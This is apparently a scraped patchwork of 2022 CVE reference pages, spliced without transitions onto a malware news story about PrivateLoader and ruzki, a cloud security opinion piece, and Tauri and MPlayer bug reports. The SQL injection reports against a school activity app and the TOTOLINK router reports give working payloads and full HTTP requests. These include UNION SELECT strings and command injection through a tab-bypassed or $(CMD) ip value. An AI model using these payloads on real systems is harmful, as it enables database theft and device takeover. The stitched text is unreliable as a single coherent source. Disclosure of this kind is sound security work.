School Activity Updates with SMS Notification v1.0 is vulnerable to SQL Injection via /activity/admin/modules/event/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: 0xdawn & Yc liu

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/event/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/event/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/event/index.php?view=edit&id=-201800036%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /activity/admin/modules/event/index.php?view\=edit&id\=\-201800036%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38878: bug_report/SQLi-1.md at main · MagicWHat/bug_report

School Activity Updates with SMS Notification v1.0 is vulnerable to SQL Injection via /activity/admin/modules/department/index.php?view=edit&id=.

Permalink

Cannot retrieve contributors at this time

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: salute

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/department/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/department/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/department/index.php?view=edit&id=-3%27%20union%20select%201,database(),3--+ // Leak place ---> id

GET /activity/admin/modules/department/index.php?view\=edit&id\=\-3%27%20union%20select%201,database(),3\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38832: bug_report/SQLi-1.md at main · saluteSUC/bug_report

School Activity Updates with SMS Notification v1.0 is vulnerable to SQL Injection via /activity/admin/modules/modstudent/index.php?view=view&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: salute

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/modstudent/index.php?view=view&id=

Vulnerability location: /activity/admin/modules/modstudent/index.php?view=view&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/modstudent/index.php?view=view&id=-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /activity/admin/modules/modstudent/index.php?view\=view&id\=\-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38833: bug_report/SQLi-2.md at main · saluteSUC/bug_report

Cybersecurity researchers have exposed new connections between a widely used pay-per-install (PPI) malware service known as PrivateLoader and another PPI service dubbed ruzki.
"The threat actor ruzki (aka les0k, zhigalsz) advertises their PPI service on underground Russian-speaking forums and their Telegram channels under the name ruzki or zhigalsz since at least May 2021," SEKOIA said.
The

Cybersecurity researchers have exposed new connections between a widely used pay-per-install (PPI) malware service known as PrivateLoader and another PPI service dubbed ruzki.

"The threat actor ruzki (aka les0k, zhigalsz) advertises their PPI service on underground Russian-speaking forums and their Telegram channels under the name ruzki or zhigalsz since at least May 2021," SEKOIA said.

The cybersecurity firm said its investigations into the twin services led it to conclude that PrivateLoader is the proprietary loader of the ruzki PPI malware service.

PrivateLoader, as the name implies, functions as a C++-based loader to download and deploy additional malicious payloads on infected Windows hosts. It's primarily distributed through SEO-optimized websites that claim to provide cracked software.

Although it was first documented earlier this February by Intel471, it's said to have been put to use starting as early as May 2021.

Some of the most common commodity malware families propagated through PrivateLoader include Redline Stealer, Socelars, Raccoon Stealer, Vidar, Tofsee, Amadey, DanaBot, and ransomware strains Djvu and STOP.

A May 2022 analysis from Trend Micro uncovered the malware distributing a framework called NetDooka. A follow-up report from BitSight late last month found significant infections in India and Brazil as of July 2022.

A new change spotted by SEKOIA is the use of VK.com documents service to host the malicious payloads as opposed to Discord, a shift likely motivated by increased monitoring of the platform's content delivery network.

PrivateLoader is also configured to communicate with command-and-control (C2) servers to fetch and exfiltrate data. As of mid-September, there are four active C2 servers, two in Russia and one each in Czechia and Germany.

"Based on the wide selection of malware families, which implies a wide range of threat actors or intrusion sets operating this malware, the PPI service running PrivateLoader is very attractive and popular to attackers on underground markets," the researchers said.

SEKOIA further said it unearthed ties between PrivateLoader and ruzki, a threat actor that sells bundles of 1,000 installations on infected systems located across the world ($70), or specifically Europe ($300) or the U.S. ($1,000).

These advertisements, which have been placed in the Lolz Guru cybercrime forum, target threat actors (aka prospective customers) who wish to distribute their payloads through the PPI service.

The association stems mainly from the below observations -

*   An overlap between the PrivateLoader C2 servers and that of URLs provided by ruzki to the subscribers so as to monitor installation statistics related to their campaigns
*   References to ruzki in PrivateLoader botnet sample names that were used to deliver the Redline Stealer, such as ruzki9 and 3108\_RUZKI, and
*   The fact that both PrivateLoader and ruzki commenced operations in May 2021, with the ruzki operator using the term "our loader" in Russian on its Telegram channel

"Pay-per-Install services always played a key role in the distribution of commodity malware," the researchers said.

"As yet another turnkey solution lowering the cost of entry into the cybercriminal market and a service contributing to a continuous professionalization of the cybercriminal ecosystem, it is highly likely more PrivacyLoader-related activity will be observed in the short term."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Find Link b/w PrivateLoader and Ruzki Pay-Per-Install Services

Tauri is a framework for building binaries for all major desktop platforms. Due to missing canonicalization when `readDir` is called recursively, it was possible to display directory listings outside of the defined `fs` scope. This required a crafted symbolic link or junction folder inside an allowed path of the `fs` scope. No arbitrary file content could be leaked. The issue has been resolved in version 1.0.6 and the implementation now properly checks if the requested (sub) directory is a symbolic link outside of the defined `scope`. Users are advised to upgrade. Users unable to upgrade should disable the `readDir` endpoint in the `allowlist` inside the `tauri.conf.json`.

**Describe the bug**

When a junction is created in the $APP Base directory on windows  
eg. mklink /J C:\Users\<user>\AppData\Roaming\<identifier>\TestFolder C:\Dev\TestFolder)  
The folder is accessible together with all files and folders inside using fs if read from the root directory  
const entries = await readDir('', { dir: BaseDirectory.App, recursive: true });  
But when trying to read the folder directly using  
const entries = await readDir('TestFolder', { dir: BaseDirectory.App, recursive: true });  
it fails with an error  
Uncaught (in promise) path not allowed on the configured scope: C:\Users\<user>\AppData\Roaming\<identifier>\TestFolder

**Reproduction**

1.  Create Junction in $APP directory
2.  Try to access that directory recursively with readDir with empty dir parameter
3.  Folder and its contents can be read
4.  Try to access that directory again with readDir but with the name of the directory as dir parameter

**Expected behavior**

I would expect to either not be able to access the folder at all, or be able to access it directly as well if it is accessible from root recursively.

**Platform and versions**

    Environment
      › OS: Windows 10.0.19044 X64
      › Webview2: 103.0.1264.77
      › MSVC:
          - Visual Studio Community 2019
          - Visual Studio Build Tools 2019
      › Node.js: 16.13.1
      › npm: 8.1.2
      › pnpm: 6.11.0
      › yarn: 1.22.15
      › rustup: 1.25.1
      › rustc: 1.62.1
      › cargo: 1.62.1
      › Rust toolchain: stable-x86_64-pc-windows-msvc
    
    Packages
      › @tauri-apps/cli [NPM]: 1.0.5
      › @tauri-apps/api [NPM]: 1.0.2
      › tauri [RUST]: 1.0.5,
      › tauri-build [RUST]: 1.0.4,
      › tao [RUST]: 0.12.2,
      › wry [RUST]: 0.19.0,
    
    App
      › build-type: bundle
      › CSP: unset
      › distDir: ../dist
      › devPath: http://localhost:5173/
      › framework: Vue.js
    
    App directory structure
      ├─ .vscode
      ├─ dist
      ├─ node_modules
      ├─ public
      ├─ src
      └─ src-tauri
    

**Stack trace**

_No response_

**Additional context**

_No response_

CVE-2022-39215: [bug] Accessing junction folder from within $APP folder on Windows · Issue #4882 · tauri-apps/tauri

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the input variable in main.js.

CVE-2022-37260: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

When an organization fully embraces the cloud, traditional endpoints become disposable. Organizations must adapt their security strategy for this reality.

Traditional endpoint concepts were eroding as a result of mobile device adoption, and cloud sealed the deal. Data is an organization's most valuable asset. When an organization fully embraces the cloud, traditional endpoints become disposable. Modern applications are consumed from any device, anywhere, not just controlled workstations from the confines of a sanctioned data center. Endpoints are more likely to refer to APIs or services, not desktops, laptops, or servers. Organizations must adapt their security strategy for this reality, or they're exposing themselves to risk of incident, breach, or reputational damage.

**Cloud Attack Patterns Are Different**

Attack patterns evolved with cloud adoption and mobilization. Attack patterns that compromise endpoints for persistence are more likely to trigger security monitoring mechanisms and alert security teams. Attackers need not resort to the blunt hammer approach of ransomware infection. They can rely on numerous other methods to compromise credentials, abuse services, and exfiltrate sensitive data that are just as successful and profitable. Examples of attack patterns that never touch an endpoint include:

*   Abusing access credentials for privilege escalation or account takeover (ATO)

*   Compromising digital supply chain elements like application dependencies and repositories

*   Cryptojacking, or maliciously mining cryptocurrency at the organization's expense

*   Exploiting access to liberally permissioned cloud storage services

*   Targeting machine identities rather than user identities

*   Siphoning infrastructure data from cloud provider metadata APIs

Collection and analysis of cloud environment interactions provides context to security teams to enable threat detection and response (TDR) and support digital forensics and incident response (DFIR). Continuous analysis informs baselines for secure configurations and workload behaviors. Deviations from those baselines are environmental drift or potential indicators of compromise. When a series of seemingly interconnected events are part of a complex attack chain, that event must be quickly surfaced so security teams can prioritize an appropriate response. It's a difficult problem to solve in practice because it requires data collection and correlation across heterogeneous environments and technology stacks. Attacks may also traverse on-premises and cloud environments, depending on where targeted data exists or services run.

**Organizations Have Low Success With Traditional Tools**

Organizations implement a number of security technologies to enable SecOps in modern architectures, but they all result in security gaps. Common approaches include:

*   **Network detection and response (NDR):** Network monitoring can work well for traditional environments but not in cloud. Most business traffic flows through cloud services that are external to the organization. You don't own cloud networks fully, so it can't be your source of truth.

*   **Endpoint detection and response (EDR):** Endpoints may not exist at all and workloads only persist for short intervals. Agents, particularly those that are perceived to be heavyweight, aren't technically feasible or create availability concerns. You can't treat a container workload or cloud service like a laptop or Windows workstation.

*   **Extended detection and response (XDR):** A proverbial kitchen sink approach to TDR, XDR was intended to correlate all types of event data. In reality, the XDR tooling shares traditional endpoint roots with focuses on laptops or desktops. It's best to think of EDR as next-generation EDR (NG-EDR).

*   **Security information and event management (SIEM):** The backbone of SecOps, SIEMs unfortunately become a dumping ground for too many logs and event streams. Organizations rely on their SIEM to alert on security events like ransomware or phishing attacks. Storage costs often present an issue, not to mention time wasted by analysts parsing data that may not even be actionable. SOC modernization efforts often emphasize reduction on the number of feeds into SIEM instances to improve signal-to-noise ratio for security events.

**Cloud Detection and Response Addresses Gaps**

Modern application designs, threat evolution, and weaknesses of traditional security approaches have spotlighted the need for different capabilities to support TDR and DFIR. Organizations need augmenting capabilities to succeed in their security strategy. Some in industry have started labeling this new grouping of capabilities cloud detection and response (CDR). Traits of CDR include:

*   Unify visibility across traditional, cloud, and cloud-native environments by ingesting and analyzing host telemetry, workload telemetry, and cloud event sources.

*   Improve mean-time-to-detect (MTTD) security events with automation based on service profiling, flexible and customizable rules, and ML-based detections.

*   Improve mean-time-to-respond (MTTR) with contextualized guidance for the organization's unique environments.

*   Accelerate remediation and repair time with auto-generated "as code" formats like AWS CloudFormation, Terraform, or Kubernetes YAML.

*   Bridge work streams of development, operations, and security teams via API integrations with nonsecurity and SecOps systems.

The current state of SecOps sometimes reminds me of earlier days of application security and infrastructure security, when practitioners first wrestled with digital transformation. DevOps practices put heavy emphasis on automation. We're able to quickly tear down and redeploy secure applications, but SecOps approaches also need to evolve for this reality. CDR capabilities are a path forward for organizations that must maintain security operations in modern architectures.

**About the Author**

    

Michael Isbitski, the Director of Cybersecurity Strategy at Sysdig, has researched and advised on cybersecurity for more than five years. He's versed in cloud security, container security, Kubernetes security, API security, security testing, mobile security, application protection, and secure continuous delivery. He has guided countless organizations globally in their security initiatives and supporting their business. Prior to his research and advisory experience, Mike learned many hard lessons on the front lines of IT with more than 20 years of practitioner and leadership experience focused on application security, vulnerability management, enterprise architecture, and systems engineering.

Will the Cloud End the Endpoint?

TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setTracerouteCfg function.

**Exploit Title:**Totolink 720 has a code execution vulnerability  
**Version:**V4.1.5cu.374  
**Date:**2022/08/16  
**Exploit Author:**xiaohu816  
**Vendor Homepage:**https://www.totolink.net/

**POC:**  
After the administrator logs in, enter the "system tools" - > "route tracking" page to execute the command  
Execute TLS > / TMP / 2.txt

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 58
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/advance/traceroute.html?time=1659892330160
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SESSION_ID=2:1591951611:2
    Connection: close
    
    {"command":"aaaa\tls>/tmp/2.txt","num":"4","topicurl":"setTracerouteCfg"} 
    

**Analysis Report:**  
In the processing function of setting the routing parameters of the router, the input IP address is simply checked and then written into V6 through sprintf, and then the system is called for execution  
  
You can bypass the check by \\ t to realize command injection

CVE-2022-38535: TOTOLINK-720R/totolink 720 RCode Execution2.md at 177ee39a5a8557a6bd19586731b0e624548b67ee · Jfox816/TOTOLINK-720R

TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setdiagnosicfg function.

**Exploit Title:**Totolink 720 has a code execution vulnerability  
**Version:**V4.1.5cu.374  
**Date:**2022/08/16  
**Exploit Author:**xiaohu816  
**Vendor Homepage:**https://www.totolink.net/

**POC:**  
After the administrator logs in, enter "system tools" - > "Ping diagnosis" page  
执行tls>/tmp/1.txt命令

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1  
    Content-Length: 52  
    Accept: application/json, text/javascript, */*; q=0.01  
    X-Requested-With: XMLHttpRequest  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36  
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
    Origin: http://192.168.0.1  
    Referer: http://192.168.0.1/advance/diagnosis.html?time=1659889464870  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: SESSION_ID=2:1591951611:2  
    Connection: close  
    
    {"ip":"aaaa\tls>/tmp/1.txt","num":"2","topicurl":"setDiagnosisCfg"}   
    

**Analysis Report:**  
In the setdiagnosicfg function, the value string corresponding to the IP in the JSON data is directly put into V6

  
Just write a string such as $(CMD) in the value corresponding to the IP to complete the command injection at CMD

CVE-2022-38534: TOTOLINK-720R/TOTOLINK 720 RCode Execution.md at fb6ba109ba9c5bd1b0d8e22c88ee14bdc4a75e6b · Jfox816/TOTOLINK-720R

Mplayer SVN-r38374-13.0.1 is vulnerable to Memory Leak via vf.c and vf_vo.c.

**#2390 closed defect (fixed)**

Reported by:

Owned by:

beastd

Priority:

normal

Component:

vf

Version:

unspecified

Severity:

normal

Keywords:

Cc:

Blocked By:

Blocking:

Reproduced by developer:

no

Analyzed by developer:

no

Summary of the bug: Found a .viv file for mplayer where asan reports a memory leak.  
How to reproduce:Use the attached file to reproduce this issue (ASAN-recompilation are required)  
version: SVN-r38374-13.0.1  
kernel version:ubuntu 20.04; Linux 5.15.0-46-generic  
complier version:clang 13.0.1-2ubuntu2~20.04.1  

mplayer and ASAN output:  

Player SVN-r38374-13.0.1 (C) 2000-2022 MPlayer Team  

Playing /home/ldy/sample/useful/03-KimagureOrangeRoad.viv.  
libavformat version 58.29.100 (external)  
VIVO file format detected.  
VIDEO: \[viv2\] 320x240 24bpp 10.000 fps 0.0 kbps ( 0.0 kbyte/s)  
\[gl\] using extended formats. Use -vo gl:nomanyfmts if playback fails.  
\==========================================================================  
Requested video codec family \[vivo\] (vfm=vfw) not available.  
Enable it at compilation.  
Cannot find codec matching selected -vo and video format 0x32766976.  
\==========================================================================  
Clip info:  

> title: <No Title>  
> author: NV  
> copyright: <No Copyright>  
> encoder: VivoActive VideoNow 3.0 for Windows  

Load subtitles in /home/ldy/sample/useful/  
\==========================================================================  
Requested audio codec family \[vivoaudio\] (afm=acm) not available.  
Enable it at compilation.  
Opening audio decoder: \[ffmpeg\] FFmpeg/libavcodec audio decoders  
libavcodec version 58.54.100 (external)  
Cannot find codec 'siren' in libavcodec...  
ADecoder init failed :(  
ADecoder init failed :(  
Cannot find codec for audio format 0x112.  
Audio: no sound  
Video: no video  

Exiting... (End of file)  

\=================================================================  
\==3993864==ERROR: LeakSanitizer: detected memory leaks  

Direct leak of 576 byte(s) in 1 object(s) allocated from:  

> #0 0x55ac7b1e06dd in malloc (/home/ldy/good\_mplayer/asan\_playr/mplayer+0x33e6dd)  
> #1 0x55ac7b42992e in vf\_open\_plugin /home/ldy/good\_mplayer/mplayer/libmpcodecs/vf.c:478:8  

Indirect leak of 24 byte(s) in 1 object(s) allocated from:  

> #0 0x55ac7b1e0872 in interceptor\_calloc (/home/ldy/good\_mplayer/asan\_playr/mplayer+0x33e872)  
> #1 0x55ac7b50a2cd in vf\_open /home/ldy/good\_mplayer/mplayer/libmpcodecs/vf\_vo.c:215:14  

SUMMARY: AddressSanitizer: 600 byte(s) leaked in 2 allocation(s).

Tag

#windows